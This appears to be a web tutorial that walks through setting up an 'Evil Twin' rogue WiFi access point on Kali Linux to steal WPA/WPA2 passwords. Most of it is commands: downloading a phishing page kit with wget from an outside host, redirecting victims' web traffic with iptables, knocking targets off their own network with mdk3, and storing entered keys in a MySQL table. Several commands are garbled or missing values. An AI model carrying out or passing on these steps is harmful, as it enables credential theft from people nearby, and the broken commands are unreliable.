fake access point

Evil Twin APs (i.e. Access Points) are rigged access points that pretend to be WiFi hotspots. When a person connects to an Evil Twin AP, his information will be exposed to the hacker.

To the victim, the malicious access point is a hotspot that has great signal. This perception results from the fact that the hacker is near the victim. People love strong WiFi networks,

so it’s likely that a victim will connect to an Evil Twin AP.

The Process

1. Access your Kali computer.

2. Make sure that you have internet connection.

3. Launch a terminal and enter

apt-get install dhcp3-server

This command will install a DHCP server onto your machine.

4. Type


And press Enter. Your terminal will display an empty file.

5. Type the following commands:


default-lease-time 600

max-lease-time 6000

subnet netmask {

option subnet-mask

option broadcast-address

option routers

option domain-name-servers



6. Once done, use the CTRL+X key combination and press “Y”.

7. Switch to another directory by typing:

cd /var/www

8. Then, issue the following commands:

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip

9. Trigger MySQL and the Apache server by typing:

/etc/init.d/mysql start

/etc/init./apache2 start

10. You will use MySQL to generate a database for storing WPA/WPA2 passwords. Here are commands that you must issue:

Mysql –u root

create database evil_twin;

use evil_twin

create tale wpa_keys(passwors varchar(64), confirm varchar(64));

11. Type “ip route” to determine your local IP address.

12. Identify the name of your network adapter using this command:

airmon-ng start wlan0

13. Update the OUI (Organizationally Unique Identifier) of your Airodump-ng program. Here’s the command:


14. Find the ESSID (Extended Service Set Identification), BSSID (the MAC address of your access point), and the channel that you need to use. The command that you should use is:

airodump-ng –M mon0

15. Activate the Evil Twin AP using this syntax:

airbase-ng –e [insert ESSID here] –c [insert channel number here] –P mon0

16. The Airbase-ng program created a tunnel interface on your behalf. You just have to configure this tunnel interface to connect your wired interface and your “evil” access point. To do this, you must launch a terminal and type the following:

ifconfig [name of tunnel interface] netmask

17. Enable internet protocol forwarding through these commands:

route add –net netmask gw

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables –table net –append POSTROUTING –out-interface

[name of local interface]



iptables –append FORWARD –in-interface [name of tunnel interface] –j ACCEPT

iptables –t net –A PREROUTING –p tcp –dport 80 –j DNET –to-destination [LOCALIP


iptables –t net –A POSTROUTING –j MASQUERADE

dhcpd –cf /etc./dhcpd.conf –pf /var/run/dhcpd.pid [name of tunnel interface]

etc./init.d/isc-dhcp-server start

18. Disconnect your targets from their current wireless networks. To accomplish this, you must generate a “blacklist” file to hold the target’s BSSID. Issue the following commands:

echo [BSSID] > blacklist

mdk3 mon0 d –b blacklist –c [CH.#]

19. Look at the terminal that holds your Airbase-ng program. See if a target connected to your access point. When a person tries to connect, he will see a security page that asks for the WPA/WPA2 key.

20. Check the terminal for your MySQL database and enter the following:

use evil_twin

21. Access “wpa_keys” to view the data entered by your target.


Please enter your comment!
Please enter your name here